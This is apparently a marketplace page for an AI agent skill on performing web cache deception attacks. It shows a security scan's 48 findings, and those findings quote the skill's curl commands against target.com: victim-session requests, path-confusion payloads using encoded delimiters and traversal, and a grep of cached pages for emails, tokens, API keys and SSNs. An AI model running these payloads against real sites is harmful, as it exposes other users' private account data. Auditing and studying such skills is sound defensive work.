performing-web-cache-deception-attack

Enables execution of web cache deception attacks by exploiting CDN caching discrepancies to access sensitive content.

Install this skill

0/100

Security score

The performing-web-cache-deception-attack skill was audited on Jun 14, 2026 and we found 48 security issues across 2 threat categories. Review the findings below before installing.

Categories Tested

Security Issues

medium line 61

Curl to non-GitHub URL

SourceSKILL.md

61	curl -I http://target.com/account/profile

medium line 65

Curl to non-GitHub URL

SourceSKILL.md

65	curl -I "http://target.com/static/style.css"

medium line 71

Curl to non-GitHub URL

SourceSKILL.md

71	curl -sI "http://target.com/test.$ext" \| grep -i "x-cache\\|cf-cache"

medium line 82

Curl to non-GitHub URL

SourceSKILL.md

82	curl -b "session=VICTIM_SESSION" "http://target.com/account/profile/anything.css"

medium line 85

Curl to non-GitHub URL

SourceSKILL.md

85	curl "http://target.com/account/profile/anything.css"

medium line 90

Curl to non-GitHub URL

SourceSKILL.md

90	curl -b "session=VICTIM_SESSION" "http://target.com/account/profile/x.$ext" -o /dev/null

medium line 93

Curl to non-GitHub URL

SourceSKILL.md

93	curl -s "http://target.com/account/profile/x.$ext" \| head -c 200

medium line 102

Curl to non-GitHub URL

SourceSKILL.md

102	curl -b "session=VICTIM" "http://target.com/account/profile;anything.css"

medium line 105

Curl to non-GitHub URL

SourceSKILL.md

105	curl -b "session=VICTIM" "http://target.com/account/profile%2Fstatic.css"

medium line 106

Curl to non-GitHub URL

SourceSKILL.md

106	curl -b "session=VICTIM" "http://target.com/account/profile%3Bstyle.css"

medium line 109

Curl to non-GitHub URL

SourceSKILL.md

109	curl -b "session=VICTIM" "http://target.com/account/profile%00.css"

medium line 112

Curl to non-GitHub URL

SourceSKILL.md

112	curl -b "session=VICTIM" "http://target.com/account/profile%23.css"

medium line 115

Curl to non-GitHub URL

SourceSKILL.md

115	curl -b "session=VICTIM" "http://target.com/static/..%2Faccount/profile"

medium line 124

Curl to non-GitHub URL

SourceSKILL.md

124	curl -b "session=VICTIM" "http://target.com/static/../account/profile"

medium line 128

Curl to non-GitHub URL

SourceSKILL.md

128	curl -b "session=VICTIM" "http://target.com/static/..%2faccount/profile"

medium line 131

Curl to non-GitHub URL

SourceSKILL.md

131	curl -b "session=VICTIM" "http://target.com/account/profile/X.CSS"

medium line 134

Curl to non-GitHub URL

SourceSKILL.md

134	curl -b "session=VICTIM" "http://target.com/account/profile/%252e%252e/static.css"

medium line 143

Curl to non-GitHub URL

SourceSKILL.md

143	curl -b "session=VICTIM" "http://target.com/account/profile?cachebuster=123.css"

medium line 146

Curl to non-GitHub URL

SourceSKILL.md

146	curl -b "session=VICTIM" "http://target.com/account/profile/./style.css"

medium line 147

Curl to non-GitHub URL

SourceSKILL.md

147	curl "http://target.com/account/profile/./style.css" # Check if cached

medium line 165

Curl to non-GitHub URL

SourceSKILL.md

165	curl -I "http://target.com/account/profile/x.css"

medium line 169

Curl to non-GitHub URL

SourceSKILL.md

169	curl -s "http://target.com/account/profile/x.css" \| grep -i "email\\|name\\|token\\|api_key\\|ssn"

low line 61

External URL reference

SourceSKILL.md

61	curl -I http://target.com/account/profile

low line 65

External URL reference

SourceSKILL.md

65	curl -I "http://target.com/static/style.css"

low line 71

External URL reference

SourceSKILL.md

71	curl -sI "http://target.com/test.$ext" \| grep -i "x-cache\\|cf-cache"

low line 78

External URL reference

SourceSKILL.md

78	# Victim visits: http://target.com/account/profile/nonexistent.css

low line 82

External URL reference

SourceSKILL.md

82	curl -b "session=VICTIM_SESSION" "http://target.com/account/profile/anything.css"

low line 85

External URL reference

SourceSKILL.md

85	curl "http://target.com/account/profile/anything.css"

low line 90

External URL reference

SourceSKILL.md

90	curl -b "session=VICTIM_SESSION" "http://target.com/account/profile/x.$ext" -o /dev/null

low line 93

External URL reference

SourceSKILL.md

93	curl -s "http://target.com/account/profile/x.$ext" \| head -c 200

low line 102

External URL reference

SourceSKILL.md

102	curl -b "session=VICTIM" "http://target.com/account/profile;anything.css"

low line 105

External URL reference

SourceSKILL.md

105	curl -b "session=VICTIM" "http://target.com/account/profile%2Fstatic.css"

low line 106

External URL reference

SourceSKILL.md

106	curl -b "session=VICTIM" "http://target.com/account/profile%3Bstyle.css"

low line 109

External URL reference

SourceSKILL.md

109	curl -b "session=VICTIM" "http://target.com/account/profile%00.css"

low line 112

External URL reference

SourceSKILL.md

112	curl -b "session=VICTIM" "http://target.com/account/profile%23.css"

low line 115

External URL reference

SourceSKILL.md

115	curl -b "session=VICTIM" "http://target.com/static/..%2Faccount/profile"

low line 124

External URL reference

SourceSKILL.md

124	curl -b "session=VICTIM" "http://target.com/static/../account/profile"

low line 128

External URL reference

SourceSKILL.md

128	curl -b "session=VICTIM" "http://target.com/static/..%2faccount/profile"

low line 131

External URL reference

SourceSKILL.md

131	curl -b "session=VICTIM" "http://target.com/account/profile/X.CSS"

low line 134

External URL reference

SourceSKILL.md

134	curl -b "session=VICTIM" "http://target.com/account/profile/%252e%252e/static.css"

low line 143

External URL reference

SourceSKILL.md

143	curl -b "session=VICTIM" "http://target.com/account/profile?cachebuster=123.css"

low line 146

External URL reference

SourceSKILL.md

146	curl -b "session=VICTIM" "http://target.com/account/profile/./style.css"

low line 147

External URL reference

SourceSKILL.md

147	curl "http://target.com/account/profile/./style.css" # Check if cached

low line 151

External URL reference

SourceSKILL.md

151	"http://target.com/static/cached.css"

low line 157

External URL reference

SourceSKILL.md

157	# 1. Craft malicious URL: http://target.com/account/profile/x.css

low line 165

External URL reference

SourceSKILL.md

165	curl -I "http://target.com/account/profile/x.css"

low line 169

External URL reference

SourceSKILL.md

169	curl -s "http://target.com/account/profile/x.css" \| grep -i "email\\|name\\|token\\|api_key\\|ssn"

low line 207

External URL reference

SourceSKILL.md

207	- Target: http://target.com

Scanned on Jun 14, 2026

View Security Dashboard

Installation guide →

GitHub Stars 606

Rate this skill

Categorydevelopment

UpdatedJune 15, 2026

security-engineer development

xalgord/xalgorix